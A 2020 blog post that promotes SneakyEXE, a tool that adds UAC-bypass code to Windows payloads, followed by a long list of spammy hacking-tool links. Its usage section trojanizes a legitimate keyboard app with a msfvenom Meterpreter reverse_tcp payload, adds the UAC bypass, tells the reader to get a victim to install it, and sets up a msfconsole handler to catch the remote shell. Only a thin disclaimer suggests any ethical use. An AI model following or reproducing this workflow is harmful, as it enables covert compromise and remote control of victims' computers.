Monday, 24 August 2020

SneakyEXE: An "UAC-Bypassing" Codes Embedding Tool For Your Win32 Payload


About SneakyEXE
   SneakyEXE is a tool which helps you embedding a UAC-Bypassing function into your custom Win32 payloads (x86_64 architecture specifically).

   SneakyEXE was tested on:
  • Windows 7, 8, 10 (64 bit)
  • Parrot Security OS 4.7

   Requirements of SneakyEXE:
  • For Linux:   Architecture: Optional
       Python 3.7.x: Yes
       Module: termcolor
       Distro: Any
       Distro version: Any
  • For Windows:   Architecture: x86_64
       Python 3.7.x: No
       Module: No
       Windows version: 7, 8, 10

SneakyEXE's Installtion for Linux
   You must install Python 3 first:
  • For Debian-based distros: sudo apt install python3
  • For Arch Linux based distros: sudo pacman -S python3
   And then, open your Terminal and enter these commands:


SneakyEXE's Installtion for Windows
  • Download SneakEXE-master zip file.
  • Unzip it into your optional directory.
  • Change dir to \SneakyEXE\Win32\.
  • Execute sneakyexe.exe (or sys\sneakyexe.exe for an improved startup speed).
  • (Optional : you can copy sneakyexe.exe to whatever directory you want and delete the unzipped one)
   NOTE: The payload can only be successfully executed by the user with Administrator privilege. Users with limited token wouldn't succeed.

SneakyEXE GUI verion installation for Windows
   You must install Python 3 first. Download and run Python 3.7.x setup file from Python.org. On Install Python 3.7, enable Add Python 3.7 to PATH.
   Download SneakEXE-master zip file and unzip it.
   And then, open PowerShell or CMD on SneakyEXE folder where you have just unzipped SneakyEXE-master and enter these command:

pip install pillow
pip install pyinstaller
mkdir compile
cd compile
pyinstaller --windowed --onefile --icon=Icon.ico /source/Win32/GUI.py
cd dist
GUI.exe


How to use SneakyEXE?

Example:
   I dowloaded Unikey from Unikey.org.
   And then, i used msfvenom to inject payload to UniKeyNT.exe (payload used: windows/meterpreter/reverse_tcp). I called the payload file is uNiKeY.exe.

   After that, to embed UAC-Bypassing codes to uNiKeY.exe, i used this command:
python3 sneakyexe bin=/home/hildathedev/uNiKeY.exe out=/home/hildathedev/SneakyEXE

  And then, by some how, makes your victim installs the payload that was embedded UAC-Bypassing codes and enter these commands:

sudo msfconsole -q
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your IP address>
set LHOST <Your port>
exploit


   and wait...

Disclaimer:
  • This tool was made for academic purposes or ethical cases only. I ain't taking any resposibility upon your actions if you abuse this tool for any black-hat acitivity
  • Feel free to use this project in your software, just don't reclaim the ownerhsip.

Credits: This tool does embed UACme which was originally coded by hfiref0x but the rest was pretty much all coded by me (Zenix Blurryface).

Author: Copyright © 2019 by Zenix Blurryface.


More articles
  1. Pentest Tools Linux
  2. Free Pentest Tools For Windows
  3. Hacking Tools For Windows
  4. Kik Hack Tools
  5. Hacker Tools Free
  6. Pentest Tools Nmap
  7. Kik Hack Tools
  8. Hacking Tools Name
  9. Pentest Tools Apk
  10. Hack Tools For Ubuntu
  11. Termux Hacking Tools 2019
  12. Hacking Tools For Kali Linux
  13. Github Hacking Tools
  14. Hacker Tool Kit
  15. Physical Pentest Tools
  16. Hack Tools Github
  17. Hack Tools Github
  18. Pentest Tools Alternative
  19. Hacker Tools Free Download
  20. Hacker Tools 2019
  21. Hack Tools Online
  22. Pentest Tools Windows
  23. Pentest Tools Subdomain
  24. Hacking Tools For Windows
  25. Pentest Tools
  26. Growth Hacker Tools
  27. Pentest Tools Windows
  28. Hacker Techniques Tools And Incident Handling
  29. Pentest Box Tools Download
  30. Pentest Recon Tools
  31. Underground Hacker Sites
  32. Hacking Tools Windows
  33. Nsa Hack Tools Download
  34. Pentest Tools Bluekeep
  35. Pentest Tools Alternative
  36. Hacking Tools Windows 10
  37. Hack Tools For Mac
  38. Hacker Tools 2019
  39. Growth Hacker Tools
  40. Hack Tools For Pc
  41. Pentest Tools Kali Linux
  42. Ethical Hacker Tools
  43. Black Hat Hacker Tools
  44. Pentest Tools Bluekeep
  45. Hack Tools Pc
  46. Hacker Tools Free
  47. Hack Tools For Ubuntu
  48. Hacker Tools Apk
  49. Hacker Hardware Tools
  50. Pentest Tools Review
  51. Hacker Tool Kit
  52. How To Make Hacking Tools
  53. Beginner Hacker Tools
  54. Pentest Tools For Android
  55. Hacking Tools For Windows 7
  56. World No 1 Hacker Software
  57. New Hack Tools
  58. Hacking Tools Software
  59. Pentest Tools Website Vulnerability
  60. Hacker Tools 2020
  61. Pentest Tools Website Vulnerability
  62. Hack Apps
  63. Android Hack Tools Github
  64. Hacker Tools 2020
  65. Hacker Tools Github
  66. Hack Tools Pc
  67. Hacking App
  68. Hacker
  69. Hacking Tools For Mac
  70. Pentest Tools List
  71. Hacker Hardware Tools
  72. Pentest Tools Android
  73. Kik Hack Tools
  74. Hack Tools Mac

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

<< Home